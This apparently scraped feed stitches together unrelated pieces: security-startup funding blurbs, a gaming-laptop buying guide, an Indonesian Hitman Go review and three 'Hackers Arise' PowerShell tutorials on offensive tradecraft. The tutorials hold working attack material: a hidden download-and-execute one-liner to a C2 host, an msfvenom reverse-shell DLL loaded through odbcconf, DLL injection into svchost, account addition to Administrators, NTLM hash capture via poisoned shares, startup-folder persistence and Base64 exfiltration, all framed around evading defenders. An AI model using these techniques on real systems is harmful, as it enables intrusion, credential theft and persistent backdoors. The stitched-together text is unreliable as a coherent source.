Helmet Security has built an end-to-end platform that secures the infrastructure for agentic AI communication.
The post Helmet Security Emerges From Stealth Mode With $9 Million in Funding appeared first on SecurityWeek.
Balancing schoolwork with gaming usually means finding a laptop that can do a little bit of everything. The best gaming laptops aren’t just built for high frame rates. They also need to handle long days of writing papers, running productivity apps and streaming lectures without slowing down. A good machine should feel reliable during class and powerful enough to jump into your favorite games once homework is out of the way.
There’s a wide range of options depending on how much performance you need. Some students prefer a slim, lightweight model that’s easy to carry to school, while others want a new gaming laptop with enough GPU power to handle AAA titles. If you’re watching your budget, there are plenty of solid choices that qualify as a budget gaming laptop without cutting too many corners.
It’s also worth looking at features that help with everyday use. A bright display makes long study sessions easier on the eyes, and a comfortable keyboard is essential if you type a lot. USB-C ports, decent battery life and a responsive trackpad can make a big difference during the school day. We’ve rounded up the best laptops that strike the right mix of performance, portability and value for both gaming and schoolwork.
As we’ve mentioned, gaming laptops are especially helpful if you're doing any demanding work. Their big promise is powerful graphics performance, which isn't just limited to PC gaming. Video editing and 3D rendering programs can also tap into their GPUs to handle laborious tasks. While you can find decent GPUs on some productivity machines, like Dell's XPS 15, you can sometimes find better deals on gaming laptops. My general advice for any new workhorse: Pay attention to the specs; get at least 16GB of RAM and the largest solid state drive you can find (ideally 1TB or more). Those components are both typically hard to upgrade down the line, so it’s worth investing what you can up front to get the most out of your PC gaming experience long term. Also, don’t forget the basics like a webcam, which will likely be necessary for the schoolwork portion of your activities.
The one big downside to choosing a gaming notebook is portability. For the most part, we'd recommend 15-inch models to get the best balance of size and price. Those typically weigh in around 4.5 pounds, which is significantly more than a three-pound ultraportable. Today's gaming notebooks are still far lighter than older models, though, so at least you won't be lugging around a 10-pound brick. If you’re looking for something lighter, there are plenty of 14-inch options these days. And if you're not into LED lights and other gamer-centric bling, keep an eye out for more understated models that still feature essentials like a webcam (or make sure you know how to turn those lights off).
Not necessarily — it really depends on how you define "last longer." In terms of raw performance, gaming laptops tend to pack more powerful components than standard laptops, which means they can stay relevant for longer when it comes to handling demanding software or modern games. That makes them a solid choice if you need a system that won’t feel outdated in a couple of years, especially for students or creators who also game in their downtime.
But there’s a trade-off. All that power generates heat, and gaming laptops often run hotter and put more strain on internal components than typical ultraportables. If they’re not properly cooled or regularly maintained (think dust buildup and thermal paste), that wear and tear can shorten their lifespan. They’re also usually bulkier and have shorter battery life, which can impact long-term usability depending on your daily needs.
Gaming laptops can last longer performance-wise, but only if you take good care of them. If your needs are light — browsing, writing papers and streaming — a standard laptop may actually last longer simply because it’s under less stress day-to-day.
The GPU plays a big role in how your laptop handles visuals — and it’s especially important if you’re using your computer for both gaming and school.
For gaming, the GPU is essential. It’s responsible for rendering graphics, textures, lighting and all the visual effects that make your favorite titles look smooth and realistic. A more powerful GPU means better frame rates, higher resolutions and the ability to play modern games without lag or stuttering.
For schoolwork, the GPU matters too — but its importance depends on what you're doing. If your school tasks mostly involve writing papers, browsing the web or using productivity tools like Google Docs or Microsoft Office, you don’t need a high-end GPU. But if you’re working with graphic design, video editing, 3D modeling or anything else that’s visually demanding, a good GPU can speed things up significantly and improve your workflow.
Georgie Peru contributed to this report.
This article originally appeared on Engadget at https://www.engadget.com/computing/laptops/best-laptops-for-gaming-and-school-132207352.html?src=rss
©
© Engadget
The company has operated in stealth mode for four months and has signed dozens of customers, including eight unicorns.
The post Runlayer Emerges From Stealth Mode With $11 Million in Funding appeared first on SecurityWeek.
The cybersecurity startup will use the funds to expand its engineering team, extend collaborations, and get ready for enterprise rollout.
The post Mate Emerges From Stealth Mode With $15.5 Million in Seed Funding appeared first on SecurityWeek.
Welcome back, cyberwarriors!
We hope that throughout the Survival series, you have been learning a lot from us. Today, we introduce Living off the Land techniques that can be abused without triggering alarms. Our goal is to use knowledge from previous articles to get our job done without unnecessary attention from defenders. All the commands we cover in two parts are benign, native, and also available on legacy systems. Not all are well-known, and tracking them all is impossible as they generate tons of logs that are hard to dig through. As you may know, some legitimate software may act suspiciously with its process and driver names. Tons of false positives quickly drain defenders, so in many environments, you can fly under the radar with these commands.
Today, you’ll learn how to execute different kinds of scripts as substitutes for .ps1 scripts since they can be monitored, create fake drivers, and inject DLLs into processes to get a reverse shell to your C2.
Let’s get started!
Let’s recall the basic concepts of stealth in PowerShell from earlier articles. PowerShell is a built-in scripting environment used by system administrators to automate tasks, check system status, and configure Windows. It’s legitimate and not suspicious unless executed where it shouldn’t be. Process creation can be monitored, but this isn’t always the case. It requires effort and software to facilitate such monitoring. The same applies to .ps1 scripts. This is why we learned how to convert .ps1 to .bat to blend in in one of the previous articles. It doesn’t mean you should avoid PowerShell or its scripts, as you can create a great variety of tools with it.
Here’s a reminder of how to download and execute a script in memory with stealth:
PS > powershell.exe -nop -w h -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://C2/script.ps1')"
Walkthrough: This tells PowerShell to start quickly without loading user profile scripts (-nop), hide the window (-w h), ignore script execution rules (-ep bypass), download a script from a URL, and run it directly in memory (DownloadString + Invoke-Expression).
When you would use it: When you need to fetch a script from a remote server and run it quietly.
Why it’s stealthy: PowerShell is common for admin tasks, and in-memory execution leaves no file on disk for antivirus to scan. Skipping user profile scripts avoids potential monitoring embedded in them.
A less stealthy option would be:
PS > iwr http://c2/script.ps1 | iex
It’s important to keep in mind that Invoke-WebRequest (iwr) and Invoke-Expression (iex) are often abused by hackers. Later, we’ll cover stealthier ways to download and execute payloads.
CMD is the classic Windows command prompt used to run batch files and utilities. Although this module focuses on PowerShell, stealth is our main concern, so we cover some CMD commands. With its help, we can chain utilities, redirect outputs to files, and collect system information quietly.
Here’s how to chain enumeration with CMD:
PS > cmd.exe /c "whoami /all > C:\Temp\privs.txt & netstat -ano >> C:\Temp\privs.txt"
Walkthrough: /c runs the command and exits. whoami /all gets user and privilege info and writes it to C:\Temp\privs.txt. netstat -ano appends active network connections to the same file. The user doesn’t see a visible window.
When you would use it: Chaining commands is handy, especially if Script Block Logging is in place and your commands get saved.
Why it’s stealthy: cmd.exe is used everywhere, and writing to temp files looks like routine diagnostics.
This runs VBScript or JScript scripts from the command line. Older automation relies on it to execute scripts that perform checks or launch commands. Mainly we will use it to bypass ps1 execution monitoring. Below, you can see how we executed a JavaScript script.
PS > cscript //E:JScript //Nologo C:\Temp\script.js
Walkthrough (plain): //E:JScript selects the JavaScript engine, while //Nologo hides the usual header. The final argument points to the script that will be run.
When you would use it: All kinds of use. With the help of AI you can write an enumeration script.
Why it’s stealthy: It’s less watched than PowerShell in some environments and looks like legacy automation.
By default, it runs Windows Script Host (WSH) scripts (VBScript/JScript), often for scripts showing dialogs. As a pentester, you can run a VBScript in the background or perform shell operations without visible windows.
PS > wscript.exe //E:VBScript C:\Temp\enum.vbs //B
Walkthrough: //B runs in batch mode (no message boxes). The VBScript at C:\Temp\enum.vbs is executed by the Windows Script Host.
When you would use it: Same thing here, it really depends on the script you create. We made a system enumeration script that sends output to a text file.
Why it’s stealthy: Runs without windows and is often used legitimately.
Normally, it runs HTML Applications (HTA) containing scripts, used for small admin UIs. For pentesters, it’s a way to execute HTA scripts with embedded code. It requires a graphical interface.
PS > mshta users.hta
Walkthrough: mshta.exe runs script code in users.hta, which could create a WScript object and execute commands, potentially opening a window with output.
When you would use it: To run a seemingly harmless HTML application that executes shell commands
Why it’s stealthy: It looks like a web or UI component and can bypass some script-only rules.
These techniques rely on legitimate DLL loading or registration mechanics to get code running.
Used to load a DLL and call its exported functions, often by installers and system utilities. Pentesters can use it to execute a script or function in a DLL, like a reverse shell generated by msfvenom. Be cautious, as rundll32.exe is frequently abused.
C:\> rundll32.exe C:\reflective_dll.x64.dll,TestEntry
Walkthrough: The command runs rundll32.exe to load reflective_dll.x64.dll and call its TestEntry function.
When you would use it: To execute a DLL’s code in environments where direct execution is restricted.
Why it’s stealthy: rundll32.exe is a common system binary and its activity can blend into normal installer steps.
In plain terms it adds or removes special Windows files (like DLLs or scriptlets) from the system’s registry so that applications can use or stop using them. It is another less frequently used way to execute DLLs.
PS > regsvr32.exe /u /s .\reflective_dll.x64.dll
Walkthrough: regsvr32 is asked to run the DLL. /s makes it silent.
When you would use it: To execute a DLL via a registration process, mimicking maintenance tasks.
Why it’s stealthy: Registration operations are normal in IT workflows, so the call can be overlooked.
Normally, odbcconf.exe helps programs connect to databases by setting up drivers and connections. You can abuse it to run your DLLs. Below is an example of how we executed a generated DLL and got a reverse shell
bash > msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.57 LPORT=4444 -f dll -o file.dll
PS > odbcconf.exe INSTALLDRIVER “Printer-driverX|Driver=C:\file.dll|APILevel=2”
PS > odbcconf.exe configsysdns “Printer-driverX” “DNS=Printer-driverX”
Walkthrough: The first odbcconf command tells Windows to register a fake database driver named “Printer-driverX” using a DLL file. The APILevel=2 part makes it look like a legitimate driver. When Windows processes this, it loads file.dll, which runs a reverse shell inside of it. The second odbcconf command, creates a system data source (DSN) named “Printer-driverX” tied to that fake driver, which triggers the DLL to load again, ensuring the malicious code runs.
When you would use it: To execute a custom DLL stealthily, especially when other methods are monitored.
Why it’s stealthy: odbcconf is a legit Windows tool rarely used outside database admin tasks, so it’s not heavily monitored by security tools or admins on most systems. Using it to load a DLL looks like normal database setup activity, hiding the malicious intent.
Normally, it is a Windows tool that installs or uninstalls .NET programs, like DLLs or executables, designed to run as services or components. It sets them up so they can work with Windows, like registering them to start automatically, or removes them when they’re no longer needed. In pentest scenarios, the command is used to execute malicious code hidden in a specially crafted .NET DLL by pretending to uninstall it as a .NET service.
PS > InstallUtil.exe /logfile= /LogToConsole=false /U file.dll
Walkthrough: The command tells Windows to uninstall a .NET assembly (file.dll) that was previously set up as a service or component. The /U flag means uninstall, /logfile= skips creating a log file, and /LogToConsole=false hides any output on the screen. If file.dll is a malicious .NET assembly with a custom installer class, uninstalling it can trigger its code, like a reverse shell when the command processes the uninstall. However, for a DLL from msfvenom, this may not work as intended unless it’s specifically a .NET service DLL.
When you would use it:. It’s useful when you have admin access and need to execute a .NET payload stealthily, especially if other methods are unavailable.
Why it’s stealthy: Install utilities are commonly used by developers and administrators.
Essentially, it was designed to help with Application Virtualization, when Windows executes apps in a virtual container. We use it to inject DLLs into running processes to get our code executed. We recommend using system processes for injections, such as svchost.exe.Here is how it’s done:
PS > MavInject.exe 528 /INJECTRUNNING C:\file.dll
Walkthrough: Targets process ID 528 (svchost.exe) and instructs MavInject.exe to inject file.dll into it. When the DLL loads, it runs the code and we get a connection back.
Why you would use it: To inject a DLL for a high-privilege reverse shell, like SYSTEM access.
Why it’s stealthy: MavInject.exe is a niche Microsoft tool, so it’s rarely monitored by security software or admins, making the injection look like legitimate system behavior.
Living off the Land techniques matter a lot in Windows penetration testing, as they let you achieve your objectives using only built-in Microsoft tools and signed binaries. That reduces forensic footprints and makes your activity blend with normal admin behavior, which increases the chance of bypassing endpoint protections and detection rules. In Part 1 we covered script execution and DLL injections, some of which will significantly improve your stealth and capabilities. In Part 2, you will explore network recon, persistence, and file management to further evade detection. Defenders can also learn a lot from this to shape the detection strategies. But as it was mentioned earlier, monitoring system binaries might generate a lot of false positives.
Resources:
https://lofl-project.github.io
https://lolbas-project.github.io/#
The post PowerShell for Hackers – Survival Edition, Part 4: Blinding Defenders first appeared on Hackers Arise.
Welcome back, cyberwarriors.
We’re continuing our look at how PowerShell can be used in offensive operations, but this time with survival in mind. When you’re operating in hostile territory, creativity and flexibility keep you alive. PowerShell is a powerful tool and how well it serves you depends on how cleverly you use it. The more tricks you know, the better you’ll be at adapting when things get tense. In today’s chapter we’re focusing on a core part of offensive work, which is surviving while you’re inside the target environment. These approaches have proven themselves in real operations. The longer you blend in and avoid attention, the more you can accomplish.
We’ll split this series into several parts. This first piece is about reconnaissance and learning the environment you’ve entered. If you map the perimeter and understand the scope of your target up front, you’ll be far better placed to move into exploitation without triggering traps defenders have set up. It takes patience. As OTW says, true compromises usually require time and persistence. Defenders often rely on predictable detection patterns, and that predictability is where many attackers get caught. Neglecting the basics is a common and costly mistake.
When the stakes are high, careless mistakes can ruin everything. You can lose access to a target full of valuable information and damage your reputation among other hackers. That’s why we made this guide to help you use PowerShell in ways that emphasize staying undetected and keeping access. Every move should be calculated. Risk is part of the job, but it should never be reckless. That’s also why getting comfortable with PowerShell matters, as it gives you the control and flexibility you need to act professionally.
If you read our earlier article PowerShell for Hackers: Basics, then some of the commands in Part 1 will look familiar. In this article we build on those fundamentals and show how to apply them with survival and stealth as the priority.
Once you have access to a host, perhaps after a compromise or phishing attack, the first step is to find out exactly which system you have landed on. That knowledge is the starting point for planning lateral movement and possible domain compromise:
PS > hostname
Sometimes the hostname is not very revealing, especially in networks that are poorly organized or where the domain setup is weak. On the other hand, when you break into a large company’s network, you’ll often see machines labeled with codes instead of plain names. That’s because IT staff need a way to keep track of thousands of systems without getting lost. Those codes aren’t random, they follow a logic. If you spend some time figuring out the pattern, you might uncover hints about how the company structures its network.
To go further, you can get detailed information about the machine itself. This includes whether it is domain-joined, its hardware resources, installed hotfixes, and other key attributes.
PS > systeminfo
This command is especially useful for discovering the domain name, identifying whether the machine is virtual, and assessing how powerful it is. A heavily provisioned machine is often important. Just as valuable is the operating system type. For instance, compromising a Windows server is a significant opportunity. Servers typically permit multiple RDP connections and are less likely to be personal workstations. This makes them more attractive for techniques such as LSASS and SAM harvesting. Servers also commonly host information that is valuable for reconnaissance, as well as shares that can be poisoned with malicious LNK files pointing back to your Responder.
Once poisoned, any user accessing those shares automatically leaks their NTLMv2 hashes to you, which you can capture and later crack using tools like Hashcat.
If your shell is unstable or noninteractive and you cannot risk breaking it with systeminfo. Here is your alternative:
PS > Get-CimInstance -ClassName Win32_OperatingSystem | Select-Object Caption
Different versions of Windows expose different opportunities for abuse, so knowing the precise version is always beneficial.
Determining patch levels is important. It tells you which vulnerabilities might still be available for exploitation. End-user systems tend to be updated more regularly, but servers and domain controllers often lag behind. Frequently they lack antivirus protection, still run legacy operating systems like Windows Server 2012 R2, and hold valuable data. This makes them highly attractive targets.
Many administrators mistakenly believe isolating domain controllers from the internet is sufficient security. The consequence is often unpatched systems. We once compromised an organization in under 15 minutes with the NoPac exploit, starting from a low-privileged account, purely because their DC was outdated.
To review installed hotfixes:
PS > wmic qfe get Caption,Description,HotFixID,InstalledOn
Remember, even if a system is unpatched, modern antivirus tools may still detect exploitation attempts. Most maintain current signature databases.
Before proceeding with exploitation or lateral movement, always understand the defensive posture of the host.
Firewall configurations can reveal why certain connections succeed or fail and may contain clues about the broader network. You can find this out through passive reconnaissance:
PS > netsh advfirewall show allprofiles
The output may seem overwhelming, but the more time you spend analyzing rules, the more valuable the information becomes. As you can see above, firewalls can generate logs that are later collected by SIEM tools, so be careful before you initiate any connection.
Antivirus software is common on most systems. Since our objective here is to survive using PowerShell only, we won’t discuss techniques for abusing AV products or bypassing AMSI, which are routinely detected by those defenses. That said, if you have sufficient privileges you can query installed security products directly to learn what’s present and how they’re configured. You might be lucky to find a server with no antivirus at all, but you should treat that as the exception rather than the rule
PS > Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
This method reliably identifies the product in use, not just Microsoft Defender. For more details, such as signature freshness and scan history run this:
PS > Get-MpComputerStatus
To maximize survivability, avoid using malware on these machines. Even if logging is not actively collected, you must treat survival mode as if every move is observed. The lack of endpoint protection does not let you do everything. We saw people install Gsocket on Linux boxes thinking it would secure access, but in reality network monitoring quickly spotted those sockets and defenders shut them down. Same applies to Windows.
Perhaps the most important check is determining whether script logging is enabled. This feature records every executed PowerShell command.
PS > Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
If EnableScriptBlockLogging is set to 1, all your activity is being stored in the PowerShell Operational log. Later we will show you strategies for operating under such conditions.
Identifying who else is present on the system is another critical step.
The quser command is user-focused, showing logged-in users, idle times, and session details:
PS > quser
Meanwhile, qwinsta is session-focused, showing both active and inactive sessions. This is particularly useful when preparing to dump LSASS, as credentials from past sessions often remain in memory. It also shows the connection type whether console or RDP.
PS > qwinsta
Finding your way through a hostile network can be challenging. Sometimes you stay low and watch, sometimes you poke around to test the ground. Here are the essential commands to keep you alive.
The ARP table records known hosts with which the machine has communicated. It is both a reconnaissance resource and an attack surface:
PS > arp -a
ARP entries can reveal subnets and active hosts. If you just landed on a host, this could be valuable.
Note: a common informal convention is that smaller organizations use the 192.168.x.x address space, mid-sized organizations use 172.16.x.x–172.31.x.x, and larger enterprises operate within 10.0.0.0/8. This is not a rule, but it is often true in practice.
SSH is natively supported on modern Windows but less frequently used, since tools like PuTTY are more common. Still, it is worth checking for known hosts, as they might give you insights about the network segmentation and subnets:
PS > cat %USERPROFILE%\.ssh\known_hosts
The route table exposes which networks the host is aware of, including VLANs, VPNs, and static routes. This is invaluable for mapping internal topology and planning pivots:
PS > route print
Learning how to read the output can take some time, but it’s definitely worth it. We know many professional hackers that use this command as part of their recon toolbox.
Knowing the network interfaces installed on compromised machines helps you understand connectivity and plan next steps. Always record each host and its interfaces in your notes:
PS > ipconfig /all
Maintaining a record of interfaces across compromised hosts prevents redundant authentication attempts and gives a clearer mindmap of the environment.
The net family of commands remains highly useful, though they are often monitored. Later we will discuss bypass methods. For now, let’s review their reconnaissance value.
Knowing the password policy helps you see if brute force or spraying is possible. But keep in mind, these techniques are too noisy for survival mode:
PS > net accounts /domain
Local groups, while rarely customized in domain environments, can still be useful:
PS > net localgroup
Domain groups are far more significant:
PS > net group /domain
Checking local Administrators can show privilege escalation opportunities:
PS > net localgroup Administrators
Investigating domain group memberships often reveals misconfigured privileges:
PS > net group <group_name> /domain
With sufficient rights, groups can be manipulated:
PS > net localgroup Administrators hacker /add
PS > net group "Marketing" user /add /domain
However, directly adding accounts to highly privileged groups like Domain Admins is reckless. These groups are closely monitored. Experienced hackers instead look for overlooked accounts, such as users with the “password not required” attribute or exposed credentials in LDAP fields.
Domain computer lists reveal scope, while controllers are critical to identify and study:
PS > net group "Domain Computers" /domain
PS > net group "Domain Controllers" /domain
Controllers in particular hold the keys to Active Directory. LDAP queries against them can return huge amounts of intelligence.
Enumerating users can give you useful account names. Administrators might include purpose-based prefixes such as “adm” or “svc” for service accounts, and descriptive fields sometimes contain role notes or credential hints.
PS > net user /domain
Shares are often overlooked by beginners, and that’s a common mistake. A share is basically a place where valuable items can be stored. At first glance it may look like a pile of junk full of unnecessary files and details. And that might be true, since these shares are usually filled with paperwork and bureaucratic documents. But among that clutter we often find useful IT data like passwords, VPN configurations, network maps and other items. Finding documents owned by assistants is just as important. Assistants usually manage things for their directors, so you’ll often find a lot of directors’ private information, passwords, emails, and similar items. Here is how you find local shares hosted on your computer:
PS > net share
Remote shares can also be listed:
PS > net view \\computer /ALL
Enumerating all domain shares creates a lot of noise, but it can be done if you don’t have a clear understanding of the hosts. We do not recommend doing this. If the host names already give you enough information about their purpose, for example, “DB” or “BACKUP”, then further enumeration isn’t necessary. Going deeper can get you caught, even on a small or poorly managed network. If you decide to do it, here is how you can enumerate all shares in the domain:
PS > net view /all /domain[:domainname]
Interesting shares can be mounted for detailed searching:
PS > net use x: \\computer\share
You can search through documents in a share using specific keywords:
PS > Get-ChildItem -Recurse | Select-String -Pattern "keyword" -SimpleMatch -CaseSensitive:$false
That’s it for Part 1 of the Survival Series. We’re excited to keep this going, showing you different ways to work with systems even when you’re limited in what you can do. Sure, the commands you have are restricted, but survival sometimes means taking risks. If you play it too safe, you might get stuck and have no way forward. Time can work against you, and making bold moves at the right moment can pay off.
The goal of this series is to help you get comfortable with the Windows tools you have at your disposal for recon and pentesting. There will be times when you don’t have much, and you’ll need to make the most of what’s available.
In Part 2, we’ll go deeper looking at host inspections, DC queries, and the Active Directory modules that can give you even more insight. Having these native tools makes it easier to stay under the radar, even when things are going smoothly. As you get more experience, you’ll find that relying on built-in tools is often the simplest, most reliable way to get the job done.
The post PowerShell for Hackers: Survival Edition, Part 1 first appeared on Hackers Arise.
Welcome back, cyberwarriors!
We are continuing our PowerShell for Hackers module and today we will look at another range of scripts. Some of them will focus on stealth, like checking if the user is still at the keyboard before taking action. Others are about making your presence felt with changing wallpapers or playing sounds. We also have scripts for moving data around by turning files into text, or avoiding restrictions by disguising PowerShell scripts as batch files. We also added a script with detailed system report as a part of privilege escalation. On top of that, we will cover a quick way to establish your persistence and make it run again after a restart.
Studying these is important for both sides. Attackers see how they can keep access without suspicion and get the information they need. Defenders get to see the same tricks from the other side, which helps them know what to look out for in logs and unusual system behavior.
Let’s break them down one by one.
https://github.com/soupbone89/Scripts/tree/main/Watchman
The first script is focused on detecting whether the target is actually using the computer. This is more important than it sounds. Especially useful when you are connecting to a compromised machine through VNC or RDP. If the legitimate user is present, your sudden appearance on their screen will immediately raise suspicion. On the other hand, waiting until the workstation is unattended allows you to do things quietly.
The script has two modes:
Target-Comes: Watches the horizontal movement of the mouse cursor. If no movement is detected, it sends a harmless Caps Lock keypress every few seconds to maintain activity. This keeps the session alive and prevents the screen from locking. As soon as the cursor moves, the function stops, letting you know that the user has returned.
Target-Leaves: Observes the cursor position over a set interval. If the cursor does not move during that time, the script assumes the user has left the workstation. You can specify your own time of inactivity.
Usage is straightforward:
PS > . .\watch.ps1
PS > Target-Comes
PS > Target-Leaves -Seconds 10
For stealthier use, the script can also be loaded directly from memory with commands like iwr and iex, avoiding file drops on disk. Keep in mind that these commands may be monitored in well-secured environments.
https://github.com/soupbone89/Scripts/tree/main/Play%20Sound
Playing a sound file on a compromised machine may not have a direct operational benefit, but it can be an effective psychological tool. Some hackers use it at the end of an operation to make their presence obvious, either as a distraction or as a statement.
The script plays any .wav file of your choice. Depending on your objectives, you could trigger a harmless notification sound, play a long audio clip as harassment, or use it in combination with wallpaper changes for maximum effect.
PS > . .\play-sound.ps1
PS > PlaySound "C:\Windows\Temp\sound.wav"
https://github.com/soupbone89/Scripts/tree/main/Change%20Wallpaper
Changing the target’s wallpaper is a classic move, often performed at the very end of an intrusion. It is symbolic and visible, showing that someone has taken control. Some groups have used it in politically motivated attacks, others as part of ransomware operations to notify or scare victims.
This script supports common formats such as JPG and PNG, though Windows internally converts them to BMP. Usage is simple, and it can be combined with a sound to make an even greater impression.
PS > iwr https://raw.githubusercontent.com/... | iex
PS > Set-WallPaper -Image "C:\Users\Public\hacked.jpg" -Style Fit
https://github.com/soupbone89/Scripts/tree/main/Base642Image
When working with compromised machines, data exfiltration is often constrained. You may have limited connectivity or may be restricted to a simple PowerShell session without file transfer capabilities. In such cases, converting files to Base64 is a good workaround.
This script lets you encode images into Base64 and save the results into text files. Since text can be easily copied and pasted, this gives you a way to move pictures or other binary files without a download. The script can also decode Base64 back into an image once you retrieve the text.
Encode:
PS > img-b64 -img "C:\Users\rs1\Downloads\bytes.jpg" -location temp
PS > img-b64 -img "C:\Users\rs1\Downloads\bytes.jpg" -location desk
Decode:
PS > b64-img -file "$env:\TMP\encImage.txt" -location temp
With this, exfiltrated data can be restored to its original form on your own machine.
https://github.com/soupbone89/Scripts/tree/main/Base64%20Encoder
Base64 encoding is not just for images. It is one of the most reliable methods for handling small file transfers or encoding command strings. Some commands can break when copied directly when special characters are involved. By encoding them, you can make sure it works.
This script can encode and decode both files and strings:
PS > B64 -encFile "C:\Users\User\Desktop\example.txt"
PS > B64 -decFile "C:\Users\User\Desktop\example.txt"
PS > B64 -encString 'start notepad'
PS > B64 -decString 'cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA='
It even supports piping the results directly into the clipboard for quick use:
PS > COMMAND | clip
https://github.com/soupbone89/Scripts/tree/main/Powershell2Bat
Some environments enforce strict monitoring of PowerShell, logging every script execution and sometimes outright blocking .ps1 files. Batch files, however, are still widely accepted in enterprise settings and are often overlooked.
This script converts any .ps into a .bat file while also encoding it in Base64. This combination not only disguises the nature of the script but also reduces the chance of it being flagged by keyword filters. It is not foolproof, but it can buy you time in restrictive environments.
PS > . .\ps2bat.ps1
PS > ".\script.ps1" | P2B
The output will be a new batch file in the same directory, ready to be deployed.
https://github.com/soupbone89/Scripts/tree/main/Autostart
This is a persistence mechanism that ensures a payload is executed automatically whenever the system or user session starts. It downloads the executable from the provided URL twice, saving it into both startup directories. The use of Invoke-WebRequest makes the download straightforward and silent, without user interaction. Once placed in those startup folders, the binary will be executed automatically the next time Windows starts up or the user logs in.
This is particularly valuable for maintaining access to a system over time, surviving reboots, and ensuring that any malicious activities such as backdoors, keyloggers, or command-and-control agents are reactivated automatically. Although basic, this approach is still effective in environments where startup folders are not tightly monitored or protected.
First edit the script and specify your URL and executable name, then run it as follows:
PS > .\autostart.ps1
https://github.com/soupbone89/Scripts/tree/main/Enumerator
The script is essentially a reconnaissance and system auditing tool. It gathers a wide range of system information and saves the results to a text file in the Windows temporary directory. Hackers would find such a script useful because it gives them a consolidated report of a compromised system’s state. The process and service listings can help you find security software or monitoring tools running on the host. Hardware usage statistics show whether the system is a good candidate for cryptomining. Open ports show potential communication channels and entry points for lateral movement. Installed software is also reviewed for exploitable versions or valuable enterprise applications. Collecting everything into a single report, you save a lot of time.
To avoid touching the disk after the first compromise, execute the script in memory:
PS > iwr http://github.com/… | iex
All of this data is not only displayed in the console but also written into a report file stored at C:\Windows\Temp\scan_result.txt
Today we walked through some PowerShell tricks that you can lean on once you have a foothold. The focus is practical. You saw how to stay unnoticed, how to leave a mark when you want to, you also know how to sneak data out when traditional channels are blocked, and how to make sure your access survives a reboot. Alongside that, there is a handy script that pulls tons of intelligence if you know what you’re looking for.
These are small and repeatable pieces hackers can use for bigger moves. A mouse-watch plus an in-memory loader buys you quiet initial access. Add an autostart drop and that quiet access survives reboots and becomes a persistent backdoor. Then run the enumerator to map high value targets for escalation. Encoding files to Base64 and pasting them out in small chunks turns a locked-down host into a steady exfiltration pipeline. Wrapping PowerShell in a .bat disguises intent long enough to run reconnaissance in environments that heavily log PowerShell. Simple visual or audio changes can be used as signals in coordinated campaigns while the real work happens elsewhere.
The post PowerShell for Hackers, Part 5: Detecting Users, Media Control, and File Conversion first appeared on Hackers Arise.
Berbicara tentang seri game Hitman, yang terlintas pertama kali biasanya adalah aksi sembunyi-sembunyi penuh ketegangan, eksekusi target dengan berbagai cara kreatif, hingga petualangan penuh tantangan ala Agent 47. Namun, pada tahun 2014, Square Enix Montreal mencoba pendekatan baru yang unik dan mengejutkan para penggemar dengan merilis Hitman Go, sebuah spin-off yang mengubah formula aksi intens menjadi permainan strategi ala board game yang elegan dan penuh teka-teki.
Hitman Go bukan sekadar eksperimen kecil, melainkan transformasi besar dalam memahami kembali franchise Hitman. Game ini berhasil memadukan konsep stealth, strategi, dan puzzle-solving dalam sebuah paket minimalis namun sangat adiktif. Dirancang untuk platform mobile awalnya, Hitman Go juga hadir di berbagai platform lain seperti PC, konsol, hingga perangkat VR. Dengan gaya visualnya yang unik serta mekanisme gameplay yang simpel namun menantang, Hitman Go sukses menghadirkan pengalaman yang benar-benar segar bagi para pemain.
Hal pertama yang mencuri perhatian dari Hitman Go adalah gaya visualnya yang sangat berbeda dibandingkan seri utama Hitman. Alih-alih dunia 3D yang realistis dan detail, Hitman Go hadir dengan estetika papan permainan yang minimalis dan elegan. Setiap level ditampilkan sebagai diorama papan permainan dengan berbagai miniatur figur yang mewakili karakter utama, musuh, serta elemen-elemen lingkungan.
Desainnya dibuat dengan penuh perhatian terhadap detail, seperti meja kayu, potongan karakter yang tampak seperti figur plastik, hingga latar belakang papan permainan yang terlihat seperti ruangan dengan pencahayaan yang lembut. Gaya visual ini menciptakan suasana yang tenang dan santai, sekaligus memberikan kesan eksklusif yang jarang ditemukan dalam game berbasis strategi lainnya.
Warna-warna yang digunakan dalam Hitman Go juga sangat efektif dalam menyampaikan pesan serta tujuan permainan, di mana pemain bisa dengan mudah mengenali berbagai elemen penting dalam game, mulai dari posisi musuh, lokasi tujuan, hingga berbagai rintangan lainnya. Tampilan sederhana namun penuh gaya ini menjadi salah satu daya tarik utama yang membuat Hitman Go berhasil menarik perhatian banyak gamer yang biasanya tidak tertarik pada genre strategi.
Walaupun hadir dalam bentuk sederhana, gameplay Hitman Go sama sekali tidak boleh dianggap remeh. Game ini dirancang dengan tingkat kesulitan yang meningkat secara bertahap, membuat pemain harus berpikir keras dalam menyelesaikan setiap level. Pemain mengontrol figur Agent 47 di atas papan permainan, di mana setiap gerakan dibuat dalam bentuk langkah-langkah sederhana, layaknya pion dalam catur.
Setiap level terdiri dari berbagai jalur yang sudah ditentukan, lengkap dengan penjaga yang bergerak secara otomatis mengikuti pola tertentu. Tugas pemain adalah mencari cara terbaik untuk mencapai target atau tujuan akhir tanpa tertangkap musuh. Meski tampak sederhana, mekanik puzzle dalam Hitman Go sangat menantang dan membutuhkan perencanakan matang sebelum pemain bergerak.
Tiap level biasanya memiliki beberapa tujuan tambahan seperti menyelesaikan level dalam jumlah langkah tertentu, tidak membunuh musuh, atau mengambil barang tersembunyi. Tantangan tambahan ini memberikan nilai replayability tinggi, karena pemain akan terus tergoda untuk mengulang level demi mendapatkan skor sempurna.
Hitman Go bukan hanya sekadar puzzle biasa yang menggunakan nama Hitman demi menarik perhatian, melainkan adaptasi cerdas yang mempertahankan esensi franchise Hitman secara utuh. Elemen stealth dan strategi yang menjadi inti seri Hitman tetap hadir secara kuat dalam Hitman Go. Pemain masih harus berpikir hati-hati sebelum bertindak, merencanakan setiap langkah dengan presisi tinggi, serta memanfaatkan berbagai trik dan strategi untuk mengecoh musuh.
Berbagai elemen khas Hitman seperti penyamaran, melempar benda untuk mengalihkan perhatian, hingga eksekusi target dengan berbagai cara kreatif tetap tersedia dalam bentuk yang lebih minimalis namun efektif. Hal ini membuat penggemar lama seri Hitman tetap merasakan kesan familiar, sambil juga memperkenalkan aspek-aspek baru yang menarik dan berbeda.
